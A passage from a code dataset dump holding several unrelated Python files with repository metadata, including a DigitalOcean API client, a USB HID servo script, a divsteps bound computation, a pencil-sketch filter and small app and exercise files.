self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'enable_backups')\n else:\n json = self.request('/droplets/%s/enable_backups/' % droplet_id)\n json.pop('status', None)\n return json\n\n def disable_backups_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'disable_backups')\n else:\n json = self.request('/droplets/%s/disable_backups/' % droplet_id)\n json.pop('status', None)\n return json\n\n def rename_droplet(self, droplet_id, name):\n params = {'name': name}\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'rename', params)\n else:\n json = self.request('/droplets/%s/rename/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def destroy_droplet(self, droplet_id, scrub_data=True):\n if self.api_version == 2:\n json = self.request('/droplets/%s' % droplet_id, method='DELETE')\n else:\n params = {'scrub_data': '1' if scrub_data else '0'}\n json = self.request('/droplets/%s/destroy/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def populate_droplet_ips(self, droplet):\n droplet[u'ip_address'] = ''\n for networkIndex in range(len(droplet['networks']['v4'])):\n network = droplet['networks']['v4'][networkIndex]\n if network['type'] == 'public':\n droplet[u'ip_address'] = network['ip_address']\n if network['type'] == 'private':\n droplet[u'private_ip_address'] = network['ip_address']\n\n#regions==========================================\n def all_regions(self):\n json = self.request('/regions/')\n return json['regions']\n\n#images==========================================\n def all_images(self, filter='global'):\n params = {'filter': filter}\n json = self.request('/images/', params)\n return json['images']\n\n def private_images(self):\n if self.api_version == 2:\n json = self.request('/images?private=true')\n return json['images']\n else:\n params = {'filter': 'my_images'}\n json = self.request('/images/', params)\n return json['images']\n\n def image_v2_action(self, image_id, image_type, params=None):\n if params is None:\n params = {}\n params['type'] = image_type\n json = self.request('/images/%s/actions' % image_id, params=params, method='POST')\n return json\n\n def show_image(self, image_id):\n params = {'image_id': image_id}\n json = self.request('/images/%s' % image_id)\n return json['image']\n\n def destroy_image(self, image_id):\n if self.api_version == 2:\n self.request('/images/%s' % image_id, method='DELETE')\n else:\n self.request('/images/%s/destroy' % image_id)\n return True\n\n def transfer_image(self, image_id, region_id):\n if self.api_version == 2:\n params = {'region': region_id}\n json = self.image_v2_action(image_id, 'transfer', params)\n else:\n params = {'region_id': region_id}\n json = self.request('/images/%s/transfer' % image_id, params)\n json.pop('status', None)\n return json\n\n#ssh_keys=========================================\n def all_ssh_keys(self):\n if self.api_version == 2:\n json = self.request('/account/keys')\n else:\n json = self.request('/ssh_keys/')\n return json['ssh_keys']\n\n def new_ssh_key(self, name, pub_key):\n if self.api_version == 2:\n params = {'name': name, 'public_key': pub_key}\n json = self.request('/account/keys', params, method='POST')\n else:\n params = {'name': name, 'ssh_pub_key': pub_key}\n json = self.request('/ssh_keys/new/', params)\n return json['ssh_key']\n\n def show_ssh_key(self, key_id):\n if self.api_version == 2:\n json = self.request('/account/keys/%s/' % key_id)\n else:\n json = 
self.request('/ssh_keys/%s/' % key_id)\n return json['ssh_key']\n\n def edit_ssh_key(self, key_id, name, pub_key):\n if self.api_version == 2:\n params = {'name': name} # v2 API doesn't allow to change key body now\n json = self.request('/account/keys/%s/' % key_id, params, method='PUT')\n else:\n params = {'name': name, 'ssh_pub_key': pub_key} # the doc needs to be improved\n json = self.request('/ssh_keys/%s/edit/' % key_id, params)\n return json['ssh_key']\n\n def destroy_ssh_key(self, key_id):\n if self.api_version == 2:\n self.request('/account/keys/%s' % key_id, method='DELETE')\n else:\n self.request('/ssh_keys/%s/destroy/' % key_id)\n return True\n\n#sizes============================================\n def sizes(self):\n json = self.request('/sizes/')\n return json['sizes']\n\n#domains==========================================\n def all_domains(self):\n json = self.request('/domains/')\n return json['domains']\n\n def new_domain(self, name, ip):\n params = {\n 'name': name,\n 'ip_address': ip\n }\n if self.api_version == 2:\n json = self.request('/domains', params=params, method='POST')\n else:\n json = self.request('/domains/new/', params)\n return json['domain']\n\n def show_domain(self, domain_id):\n json = self.request('/domains/%s/' % domain_id)\n return json['domain']\n\n def destroy_domain(self, domain_id):\n if self.api_version == 2:\n self.request('/domains/%s' % domain_id, method='DELETE')\n else:\n self.request('/domains/%s/destroy/' % domain_id)\n return True\n\n def all_domain_records(self, domain_id):\n json = self.request('/domains/%s/records/' % domain_id)\n if self.api_version == 2:\n return json['domain_records']\n return json['records']\n\n def new_domain_record(self, domain_id, record_type, data, name=None, priority=None, port=None, weight=None):\n params = {'data': data}\n\n if self.api_version == 2:\n params['type'] = record_type\n else:\n params['record_type'] = record_type\n\n if name: params['name'] = name\n if priority: params['priority'] = priority\n if port: params['port'] = port\n if weight: params['weight'] = weight\n\n if self.api_version == 2:\n json = self.request('/domains/%s/records/' % domain_id, params, method='POST')\n return json['domain_record']\n else:\n json = self.request('/domains/%s/records/new/' % domain_id, params)\n return json['record']\n\n def show_domain_record(self, domain_id, record_id):\n json = self.request('/domains/%s/records/%s' % (domain_id, record_id))\n if self.api_version == 2:\n return json['domain_record']\n return json['record']\n\n def edit_domain_record(self, domain_id, record_id, record_type, data, name=None, priority=None, port=None, weight=None):\n if self.api_version == 2:\n params = {'name': name} # API v.2 allows only record name change\n json = self.request('/domains/%s/records/%s' % (domain_id, record_id), params, method='PUT')\n return json['domain_record']\n\n params = {\n 'record_type': record_type,\n 'data': data,\n }\n\n if name: params['name'] = name\n if priority: params['priority'] = priority\n if port: params['port'] = port\n if weight: params['weight'] = weight\n json = self.request('/domains/%s/records/%s/edit/' % (domain_id, record_id), params)\n return json['record']\n\n def destroy_domain_record(self, domain_id, record_id):\n if self.api_version == 2:\n self.request('/domains/%s/records/%s' % (domain_id, record_id), method='DELETE')\n else:\n self.request('/domains/%s/records/%s/destroy/' % (domain_id, record_id))\n return True\n\n#events(actions in v2 API)========================\n def 
show_all_actions(self):\n if self.api_version == 2:\n json = self.request('/actions')\n return json['actions']\n return False # API v.1 doesn't have this functionality\n\n def show_action(self, action_id):\n if self.api_version == 2:\n json = self.request('/actions/%s' % action_id)\n return json['action']\n return self.show_event(action_id)\n\n def show_event(self, event_id):\n if self.api_version == 2:\n return self.show_action(event_id)\n json = self.request('/events/%s' % event_id)\n return json['event']\n\n#floating_ips=====================================\n v2_api_required_str = ('This feature requires the V2 API. ' \\\n 'In order to continue, update DO_API_VERSION to 2.')\n\n def all_floating_ips(self):\n \"\"\"\n Lists all of the Floating IPs available on the account.\n \"\"\"\n if self.api_version == 2:\n json = self.request('/floating_ips')\n return json['floating_ips']\n else:\n raise DoError(self.v2_api_required_str)\n\n def new_floating_ip(self, **kwargs):\n \"\"\"\n Creates a Floating IP and assigns it to a Droplet or reserves it to a region.\n \"\"\"\n droplet_id = kwargs.get('droplet_id')\n region = kwargs.get('region')\n\n if self.api_version == 2:\n if droplet_id is not None and region is not None:\n raise DoError('Only one of droplet_id and region may be set when creating a Floating IP. ' \\\n 'Set one of the variables and try again.')\n elif droplet_id is None and region is None:\n raise DoError('droplet_id or region is required to create a Floating IP. ' \\\n 'Set one of the variables and try again.')\n else:\n if droplet_id is not None:\n params = {'droplet_id': droplet_id}\n else:\n params = {'region': region}\n\n json = self.request('/floating_ips', params=params, method='POST')\n return json['floating_ip']\n else:\n raise DoError(self.v2_api_required_str)\n\n def destroy_floating_ip(self, ip_addr):\n \"\"\"\n Deletes a Floating IP and removes it from the account.\n \"\"\"\n if self.api_version == 2:\n self.request('/floating_ips/' + ip_addr, method='DELETE')\n else:\n raise DoError(self.v2_api_required_str)\n\n def assign_floating_ip(self, ip_addr, droplet_id):\n \"\"\"\n Assigns a Floating IP to a Droplet.\n \"\"\"\n if self.api_version == 2:\n params = {'type': 'assign', 'droplet_id': droplet_id}\n\n json = self.request('/floating_ips/' + ip_addr + '/actions', params=params, method='POST')\n return json['action']\n else:\n raise DoError(self.v2_api_required_str)\n\n def unassign_floating_ip(self, ip_addr):\n \"\"\"\n Unassigns a Floating IP from a Droplet.\n The Floating IP will be reserved in the region but not assigned to a Droplet.\n \"\"\"\n if self.api_version == 2:\n params = {'type': 'unassign'}\n\n json = self.request('/floating_ips/' + ip_addr + '/actions', params=params, method='POST')\n return json['action']\n else:\n raise DoError(self.v2_api_required_str)\n\n def list_floating_ip_actions(self, ip_addr):\n \"\"\"\n Retrieve a list of all actions that have been executed on a Floating IP.\n \"\"\"\n if self.api_version == 2:\n json = self.request('/floating_ips/' + ip_addr + '/actions')\n return json['actions']\n else:\n raise DoError(self.v2_api_required_str)\n\n def get_floating_ip_action(self, ip_addr, action_id):\n \"\"\"\n Retrieve the status of a Floating IP action.\n \"\"\"\n if self.api_version == 2:\n json = self.request('/floating_ips/' + ip_addr + '/actions/' + action_id)\n return json['action']\n else:\n raise DoError(self.v2_api_required_str)\n\n#tags=====================================\n def new_tag(self, name):\n if self.api_version == 2:\n params = {\n 'name': str(name)\n }\n json 
= self.request('/tags', params=params, method='POST')\n return json['tag']\n else:\n raise DoError(self.v2_api_required_str)\n\n def show_tag(self, name):\n if self.api_version == 2:\n json = self.request('/tags/%s' % name, method='GET')\n return json['tag']\n else:\n raise DoError(self.v2_api_required_str)\n\n def all_tags(self):\n if self.api_version == 2:\n json = self.request('/tags', method='GET')\n return json['tags']\n else:\n raise DoError(self.v2_api_required_str)\n\n def edit_tag(self, current_name, new_name):\n if self.api_version == 2:\n params = {\n 'name': str(new_name)\n }\n json = self.request('/tags/%s' % current_name, params=params, method='PUT')\n return json['tag']\n else:\n raise DoError(self.v2_api_required_str)\n\n def destroy_tag(self, name):\n if self.api_version == 2:\n json = self.request('/tags/%s' % name, method='DELETE')\n json.pop('status', None)\n return json\n else:\n raise DoError(self.v2_api_required_str)\n\n def tag_resource(self, tag_name, resource_id, resource_type='droplet'):\n if self.api_version == 2:\n params = {\n 'resources': [\n {\n 'resource_id': str(resource_id),\n 'resource_type': str(resource_type)\n }\n ]\n }\n\n json = self.request('/tags/%s/resources' % tag_name, params=params, method='POST')\n json.pop('status', None)\n return json\n else:\n raise DoError(self.v2_api_required_str)\n\n def untag_resource(self, tag_name, resource_id, resource_type='droplet'):\n if self.api_version == 2:\n params = {\n 'resources': [\n {\n 'resource_id': str(resource_id),\n 'resource_type': str(resource_type)\n }\n ]\n }\n\n json = self.request('/tags/%s/resources' % tag_name, params=params, method='DELETE')\n json.pop('status', None)\n return json\n else:\n raise DoError(self.v2_api_required_str)\n\n#low_level========================================\n def request(self, path, params=None, method='GET'):\n if params is None:\n params = {}\n if not path.startswith('/'):\n path = '/'+path\n url = self.api_endpoint+path\n\n if self.api_version == 2:\n headers = {'Authorization': \"Bearer %s\" % self.api_key}\n resp = self.request_v2(url, params=params, headers=headers, method=method)\n else:\n params['client_id'] = self.client_id\n params['api_key'] = self.api_key\n resp = self.request_v1(url, params, method=method)\n\n return resp\n\n def request_v1(self, url, params=None, method='GET'):\n try:\n resp = requests.get(url, params=params, timeout=60)\n json = resp.json()\n except ValueError: # requests.models.json.JSONDecodeError\n raise ValueError(\"The API server didn't respond with valid JSON\")\n except requests.RequestException as e: # errors from requests\n raise RuntimeError(e)\n\n if resp.status_code != requests.codes.ok:\n if json:\n if 'error_message' in json:\n raise DoError(json['error_message'])\n elif 'message' in json:\n raise DoError(json['message'])\n # The JSON response is bad, so raise an exception with the HTTP status\n resp.raise_for_status()\n if json.get('status') != 'OK':\n raise DoError(json['error_message'])\n\n return json\n\n def process_response(self, response):\n if response.status_code == 204:\n return {'status': response.status_code}\n else:\n return response.json()\n\n @paginated\n def request_v2(self, url, headers=None, params=None, method='GET'):\n if headers is None:\n headers = {}\n if params is None:\n params = {}\n headers['Content-Type'] = 'application/json'\n\n try:\n if method == 'POST':\n resp = requests.post(url, data=json_module.dumps(params), headers=headers, timeout=60)\n json = self.process_response(resp)\n elif method == 'DELETE':\n resp = requests.delete(url, data=json_module.dumps(params), headers=headers, timeout=60)\n 
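# POST and DELETE responses are routed through process_response() because a\n # successful DELETE typically answers 204 No Content with an empty body;\n # process_response() maps that to {'status': 204} instead of attempting to\n # decode empty JSON.\n 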
json = self.process_response(resp)\n elif method == 'PUT':\n resp = requests.put(url, headers=headers, params=params, timeout=60)\n json = resp.json()\n elif method == 'GET':\n resp = requests.get(url, headers=headers, params=params, timeout=60)\n json = resp.json()\n else:\n raise DoError('Unsupported method %s' % method)\n\n except ValueError: # requests.models.json.JSONDecodeError\n raise ValueError(\"The API server didn't respond with valid JSON\")\n except requests.RequestException as e: # errors from requests\n raise RuntimeError(e)\n\n if resp.status_code != requests.codes.ok:\n if json:\n if 'error_message' in json:\n raise DoError(json['error_message'])\n elif 'message' in json:\n raise DoError(json['message'])\n # The JSON response is bad, so raise an exception with the HTTP status\n resp.raise_for_status()\n\n if json.get('id') == 'not_found':\n raise DoError(json['message'])\n\n return json\n\n\nif __name__ == '__main__':\n import os\n if os.environ.get('DO_API_VERSION') == '2':\n api_token = os.environ.get('DO_API_TOKEN') or os.environ['DO_API_KEY']\n do = DoManager(None, api_token, 2)\n else:\n client_id = os.environ['DO_CLIENT_ID']\n api_key = os.environ['DO_API_KEY']\n do = DoManager(client_id, api_key, 1)\n import sys\n fname = sys.argv[1]\n import pprint\n # size_id: 66, image_id: 1601, region_id: 1\n pprint.pprint(getattr(do, fname)(*sys.argv[2:]))\n","repo_name":"Wiredcraft/dopy","sub_path":"dopy/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":26460,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"37"}
{"seq_id":"30737253605","text":"import hid\nimport time\n\n\ndef pad_or_truncate(some_list, target_len):\n return some_list[:target_len] + [0]*(target_len - len(some_list))\n\ndev = hid.device()\ndev.open(0x0483, 0x5750)\n\nprint(\"Manufacturer: %s\" % dev.get_manufacturer_string())\nprint(\"Product: %s\" % dev.get_product_string())\nprint(\"Serial No: %s\" % dev.get_serial_number_string())\n\n# enable non-blocking mode\ndev.set_nonblocking(1)\n\n# write some data to the device\nprint(\"Write the data\")\ndata = [0, 0x55, 0x55, 2, 0x0f]\ndata = pad_or_truncate(data, 65)\ndev.write(data)\n\n# wait\n#time.sleep(0.05)\n\n# read back the answer\nprint(\"Read the data\")\nresponse = []\nwhile True:\n d = dev.read(64, 50)\n if d:\n response.extend(d)\n else:\n break\n\nprint(f\"{(response[5] * 256 + response[4])/1000} VDC\")\n\nprint(\"Closing the device\")\ndev.close()","repo_name":"ccourson/xArmServoController","sub_path":"Python/hidapi.py","file_name":"hidapi.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"37"}
{"seq_id":"30000763979","text":"from Job import Job\n\nclass Medic(Job):\n def __init__(self):\n super().__init__()\n self.jobName = \"Medic\"\n self.description = \"\"\n self.nextJobs = ['Healer', 'Doctor']\n self.changeCStatBoosts([\n (\"Strength\", 0.1),\n (\"Speed\", 0.2),\n (\"Stamina\", 0.5),\n (\"HP\", 0.5),\n (\"Medical Expertise\", 0.2)\n ])\nclass Healer(Medic):\n def __init__(self):\n super().__init__()\n self.jobName = \"Healer\"\n self.description = \"\"\n self.nextJobs = ['Grand Healer', 'Elemental Healer', 'Black Healer']\n self.changeCStatBoosts([\n (\"Strength\", 0.1),\n (\"Speed\", 0.1),\n (\"Stamina\", 0.5),\n (\"HP\", 0.5),\n (\"MP\", 0.5),\n (\"Intelligence\", 0.2),\n (\"Medical Expertise\", 0.2)\n ])\nclass Doctor(Medic):\n def __init__(self):\n super().__init__()\n self.jobName = 
\"Doctor\"\n self.description = \"\"\n self.nextJobs = ['Surgeon', 'Psychologist', 'Master Doctor']\n self.changeCStatBoosts([\n (\"Strength\", 0.1),\n (\"Speed\", 0.1),\n (\"Stamina\", 0.5),\n (\"HP\", 0.5),\n (\"Medical Expertise\", 0.4)\n ])","repo_name":"achakka007/Aincrad","sub_path":"Finished/Jobs/Medic.py","file_name":"Medic.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"21495287945","text":"#!/bin/env python\n\n\"\"\"Compute ranges of moduli that can be handled with given numbers of divsteps.\n\nOutput will include lines like these:\n\n ...\n 721 0x68c99daf6eb26776b8a7a2ace253df30d84c7c4328ac408aa128dc8ca448a777 (2**254.711324)\n 722 0x9e4ccd3a0a07119e8a58e4ff434f504ad45434b4af37b913db51296f40fa5a5b (2**255.306518)\n 723 0xaa040650e6d9c377b515b9e3d71fbfacc6c7f06f115dd0693166a8a64511ef26 (2**255.409524)\n 724 0x1030596cf6d817d1357f908ef70cdb00b38d047fbba852139babb6c8646fb15b2 (2**256.016930)\n ...\n\nindicating that e.g. for any input 1 <= f <= 0x9e4c..5a5b and 0 <= g <= f, 722 divstep\niterations is sufficient to reach g=0. That means 722 divsteps is sufficient for computing\nmodular inverses for any 255-bit modulus, and 724 is sufficient for any 256-bit modulus.\n\nThis code runs significantly faster in PyPy.\n\nWhen running with --half-delta, analysis will be performed for a variant of divsteps\nthat is equivalent to the original one but with starting value delta=1/2 instead of\ndelta=1.\n\"\"\"\n\nimport argparse\nimport math\n\n# When running with --half-delta, we scale delta by a factor 2, and thus always increment\n# by 2 instead of 1.\nINC = 1\n\ndef convex_hull(points):\n \"\"\"Computes the convex hull of a set of 2D points.\n\n Input: a list of (x, y) pairs representing the points.\n Output: a list of vertices of the convex hull in counter-clockwise order.\n\n This implements Andrew's monotone chain algorithm, based on\n https://en.wikibooks.org/wiki/Algorithm_Implementation/Geometry/Convex_hull/Monotone_chain\n \"\"\"\n # Boring case: zero or one point.\n if len(points) <= 1:\n return points\n # Sort the points lexicographically (tuples are compared lexicographically).\n points = sorted(points)\n # Build lower hull.\n lower = [points[0]]\n for point in points[1:]:\n while len(lower) >= 2 and ((lower[-1][0] - lower[-2][0]) * (point[1] - lower[-2][1]) <=\n (lower[-1][1] - lower[-2][1]) * (point[0] - lower[-2][0])):\n lower.pop()\n if lower[-1] != point:\n lower.append(point)\n if len(lower) == 1:\n return lower\n # Build upper hull.\n upper = [points[-1]]\n for point in reversed(points[:-1]):\n while len(upper) >= 2 and ((upper[-1][0] - upper[-2][0]) * (point[1] - upper[-2][1]) <=\n (upper[-1][1] - upper[-2][1]) * (point[0] - upper[-2][0])):\n upper.pop()\n if upper[-1] != point:\n upper.append(point)\n # Concatenation of the lower and upper hulls gives the convex hull.\n # The last point of each list is omitted because it is repeated at the beginning\n # of the other list.\n return lower[:-1] + upper[:-1]\n\ndef process_divstep(state):\n \"\"\"Apply one divstep to state.\n\n state is a dict of the form delta -> [points, abs_g], where points is a set of (f, g)\n coordinates (multiplied by 2**step so that they remain integral) that defines a convex\n hull of possible combinations of f and g. 
abs_g is the largest abs(g) in points, or\n the largest such value in any of the contributing hulls if that is smaller.\n\n Every invocation of this function will compute the new state based on the previous state,\n taking into account that not every transition is possible for every delta, but always\n exploring both the \"odd g\" and \"even g\" variants.\n \"\"\"\n\n new_state = dict()\n for delta, (points, abs_g) in state.items():\n # Odd g:\n if delta > 0:\n # divsteps^n(delta,f,g) = divsteps^{n-1}(1-delta,g,(g-f)/2)\n n = new_state.setdefault(INC - delta, [[], 0])\n n[0].extend((g << 1, g - f) for f, g in points)\n n[1] = max(n[1], abs_g << 1)\n else:\n # divsteps^n(delta,f,g) = divsteps^{n-1}(1+delta,f,(f+g)/2)\n n = new_state.setdefault(INC + delta, [[], 0])\n n[0].extend((f << 1, g + f) for f, g in points)\n n[1] = max(n[1], abs_g << 1)\n\n # Even g:\n # divsteps^n(delta,f,g) = divsteps^{n-1}(1+delta,f,g/2)\n n = new_state.setdefault(INC + delta, [[], 0])\n n[0].extend((f << 1, g) for f, g in points)\n n[1] = max(n[1], abs_g << 1)\n\n for delta in new_state:\n # Minimize the set of points by computing a new convex hull over them.\n new_state[delta][0] = convex_hull(new_state[delta][0])\n # Update abs_g values for every hull.\n new_state[delta][1] = min(new_state[delta][1], max(abs(g) for _, g in new_state[delta][0]))\n\n return new_state\n\n\nparser = argparse.ArgumentParser(description=\"Compute the largest modulus for every number of divsteps.\")\nparser.add_argument('--half-delta', '-d', action='store_true', default=False, help=\"Use half-delta divsteps rule\")\nargs = parser.parse_args()\nif args.half_delta:\n INC = 2\n\n# Define the initial state: a single hull for delta=1, defining the triangle f=0..1 g=0..f.\nSTEP = 0\nSTATE = {1: [[(0, 0), (1, 0), (1, 1)], 1]}\nwhile True:\n # Compute next state.\n STATE = process_divstep(STATE)\n STEP += 1\n # Compute the maximum of all abs_g values over all hulls at the current state.\n # For any input f,g, and any valid sequence of divsteps applied to it, abs(g)\n # must at some point have been less than or equal to that value (divided by 2**STEP).\n max_abs_g = max(abs_g for _, abs_g in STATE.values())\n # Thus, if the input triangle had been alpha=(2**STEP / max_abs_g)-epsilon times\n # larger, abs(g) would at some point have been < 1. 
In the actual algorithm, g is an\n # integer, and thus abs(g)<1 implies g=0, which means the computation would have\n # been complete for any input.\n alpha = ((1 << STEP) - 1) // max_abs_g\n # That scaled triangle is f=0..alpha g=0..f, covering all moduli up to alpha, and all\n # inputs up to the modulus.\n print(\"%i 0x%x (2**%f)\" % (STEP, alpha, math.log(alpha, 2)))\n","repo_name":"sipa/safegcd-bounds","sub_path":"hull_bound.py","file_name":"hull_bound.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"}
{"seq_id":"32837344676","text":"from app.service.dictionary_service import DictionaryService\nfrom app.service.practice_service import PracticeService\nfrom app.service.search_service import SearchService\nfrom app.service.word_service import WordService\n\n\nclass DashboardService:\n def __init__(self):\n self.dictionary_service = DictionaryService()\n self.word_service = WordService()\n self.search_service = SearchService()\n self.practice_service = PracticeService()\n\n def get_dashboard_metric(self, user_id):\n response = {}\n response['total_word'] = self.dictionary_service.get_count_by_specific_columns(user_id=user_id)\n response['search_count'] = self.search_service.get_count_by_specific_columns(user_id=user_id)\n response['total_practice'] = self.practice_service.get_count_by_specific_columns(user_id=user_id)\n response['success_ratio'] = ''\n all_practice = self.practice_service.get_all_by_specific_column(user_id=user_id)\n success_count = 0\n fail_count = 0\n for practice in all_practice:\n if practice.is_success:\n success_count += 1\n else:\n fail_count += 1\n\n print(success_count, \" \", fail_count)\n if (success_count + fail_count) != 0:\n response['success_ratio'] = int((success_count / (success_count + fail_count)) * 100)\n\n return response\n","repo_name":"aliereno/personal-dictionary","sub_path":"app/service/dashboard_service.py","file_name":"dashboard_service.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"23549016705","text":"from io import StringIO\nimport sys\n\ninput1 = \"\"\"4\nPesho\nStefan\nStamat\nGosho\"\"\"\ninput2 = \"\"\"6\nPreslav\nGosho\nIvan\nStamat\nPesho\nStefan\"\"\"\n\n# sys.stdin = StringIO(input1)\nsys.stdin = StringIO(input2)\n\nnumber = int(input())\nodd_set = set()\neven_set = set()\n\nfor row in range(1, number + 1):\n name = input()\n result = int((sum(ord(ch) for ch in name)) / row)\n if result % 2 == 0:\n even_set.add(result)\n else:\n odd_set.add(result)\n\nif sum(odd_set) == sum(even_set):\n final = odd_set.union(even_set)\nelif sum(odd_set) > sum(even_set):\n final = odd_set.difference(even_set)\nelse:\n final = odd_set.symmetric_difference(even_set)\n\nprint(\", \".join(str(el) for el in final))\n","repo_name":"NPencheva/Python_Advanced","sub_path":"02_tuples_and_sets/02_tuples_and_sets_exercises/06_battle_of_names.py","file_name":"06_battle_of_names.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"19929920362","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 15 19:04:47 2018\n\n@author: debja\n\"\"\"\n\nimport imageio\n\nimg = r\"C:\\Users\\debja\\Desktop\\test_pic.jpg\"\nstart_img = imageio.imread(img)\n\n#interpret image shape\nstart_img.shape\n\n#applying greyscale\nimport numpy as np\ndef grayscale(rgb):\n return 
np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\ngray_img = grayscale(start_img)\n\n#inverted image\ninverted_img = 255-gray_img\n\n#blur the inverted image\nimport scipy.ndimage\nblur_img = scipy.ndimage.filters.gaussian_filter(inverted_img,sigma=20)\n#play with sigma for clearer results!\n\n#dodge and merge\n#divides the bottom layer by the inverted top layer\ndef dodge(front,back):\n result=front*255/(255-back) \n result[result>255]=255\n result[back==255]=255\n return result.astype('uint8')\nfinal_img= dodge(blur_img,gray_img)\n\n#result plot\nimport matplotlib.pyplot as plt\nplt.imshow(final_img, cmap=\"gray\")\n\n#save\nplt.imsave('img3.png', final_img, cmap='gray', vmin=0, vmax=255)","repo_name":"ahelii16/Pencil-Sketch","sub_path":"PencilSketch.py","file_name":"PencilSketch.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35563646163","text":"from django.urls import path,include\nfrom . import views\nurlpatterns = [\n path('',views.mainpage,name='mainpage'),\n path('addtable',views.addtable,name='addtable'),\n path('showpage',views.showpage,name='showpage'),\n path('editpage/',views.editpage,name='editpage'),\n path('update/',views.update,name='update'),\n path('delete/',views.delete,name='delete'),\n\n]\n","repo_name":"minu21shahabas/Image-Project","sub_path":"imgapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75170964906","text":"# -*- coding: utf-8 -*-\n\n# Kraven Plugin\n#\n# Coded/Modified/Adapted by örlgrey\n# Based on VTi and/or OpenATV image source code\n# Thankfully inspired by MyMetrix by iMaxxx\n#\n# This code is licensed under the Creative Commons \n# Attribution-NonCommercial-ShareAlike 3.0 Unported \n# License. 
To view a copy of this license, visit\n# http://creativecommons.org/licenses/by-nc-sa/3.0/ \n# or send a letter to Creative Commons, 559 Nathan \n# Abbott Way, Stanford, California 94305, USA.\n#\n# If you think this license infringes any rights,\n# please contact me at ochzoetna@gmail.com\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom .ColorSelection import KravenHDColorSelection\nfrom Screens.Screen import Screen\nfrom Screens.MessageBox import MessageBox\nfrom Screens.ChoiceBox import ChoiceBox\nfrom Screens.Standby import TryQuitMainloop\nfrom Screens.VirtualKeyBoard import VirtualKeyBoard\nfrom Components.ActionMap import ActionMap\nfrom Components.AVSwitch import AVSwitch\nfrom copy import deepcopy\nfrom Components.config import config, configfile, getConfigListEntry, ConfigYesNo, ConfigSubsection, ConfigSelection, ConfigText, ConfigClock, ConfigSlider\nfrom Components.ConfigList import ConfigListScreen\nfrom Components.Sources.StaticText import StaticText\nfrom Components.Label import Label\nfrom Components.Language import language\nfrom os import environ, listdir, system, popen, path\nfrom shutil import move\nfrom Components.Pixmap import Pixmap\nfrom Components.Sources.CanvasSource import CanvasSource\nfrom Components.SystemInfo import SystemInfo\nfrom PIL import Image, ImageFilter, ImageDraw\nimport gettext, time, subprocess, requests\nfrom enigma import ePicLoad, getDesktop, eConsoleAppContainer, eTimer\nfrom Tools.Directories import fileExists, resolveFilename, SCOPE_LANGUAGE, SCOPE_PLUGINS\nfrom lxml import etree\nfrom xml.etree.cElementTree import fromstring\n\nfrom six.moves import range\n\n\nDESKTOP_WIDTH = getDesktop(0).size().width()\n\nlang = language.getLanguage()\nenviron[\"LANGUAGE\"] = lang[:2]\ngettext.bindtextdomain(\"enigma2\", resolveFilename(SCOPE_LANGUAGE))\ngettext.textdomain(\"enigma2\")\ngettext.bindtextdomain(\"KravenHD\", \"%s%s\" % (resolveFilename(SCOPE_PLUGINS), \"Extensions/KravenHD/locale/\"))\n\ndef _(txt):\n\tt = gettext.dgettext(\"KravenHD\", txt)\n\tif t == txt:\n\t\tt = gettext.gettext(txt)\n\treturn t\n\ndef translateBlock(block):\n\tfor x in TranslationHelper:\n\t\tif x[0] in block:\n\t\t\tblock = block.replace(x[0], x[1])\n\treturn block\n\nColorSelfList = [\n\t(\"F0A30A\", _(\"amber\")),\n\t(\"B27708\", _(\"amber dark\")),\n\t(\"1B1775\", _(\"blue\")),\n\t(\"0E0C3F\", _(\"blue dark\")),\n\t(\"7D5929\", _(\"brown\")),\n\t(\"3F2D15\", _(\"brown dark\")),\n\t(\"0050EF\", _(\"cobalt\")),\n\t(\"001F59\", _(\"cobalt dark\")),\n\t(\"1BA1E2\", _(\"cyan\")),\n\t(\"0F5B7F\", _(\"cyan dark\")),\n\t(\"FFEA04\", _(\"yellow\")),\n\t(\"999999\", _(\"grey\")),\n\t(\"3F3F3F\", _(\"grey dark\")),\n\t(\"70AD11\", _(\"green\")),\n\t(\"213305\", _(\"green dark\")),\n\t(\"A19181\", _(\"Kraven\")),\n\t(\"28150B\", _(\"Kraven dark\")),\n\t(\"6D8764\", _(\"olive\")),\n\t(\"313D2D\", _(\"olive dark\")),\n\t(\"C3461B\", _(\"orange\")),\n\t(\"892E13\", _(\"orange dark\")),\n\t(\"F472D0\", _(\"pink\")),\n\t(\"723562\", _(\"pink dark\")),\n\t(\"E51400\", _(\"red\")),\n\t(\"330400\", _(\"red dark\")),\n\t(\"000000\", _(\"black\")),\n\t(\"008A00\", _(\"emerald\")),\n\t(\"647687\", _(\"steel\")),\n\t(\"262C33\", _(\"steel dark\")),\n\t(\"6C0AAB\", _(\"violet\")),\n\t(\"1F0333\", _(\"violet dark\")),\n\t(\"ffffff\", _(\"white\")),\n\t(\"self\", _(\"self\"))\n\t]\n\nBackgroundList = [\n\t(\"F0A30A\", _(\"amber\")),\n\t(\"B27708\", _(\"amber dark\")),\n\t(\"665700\", _(\"amber very 
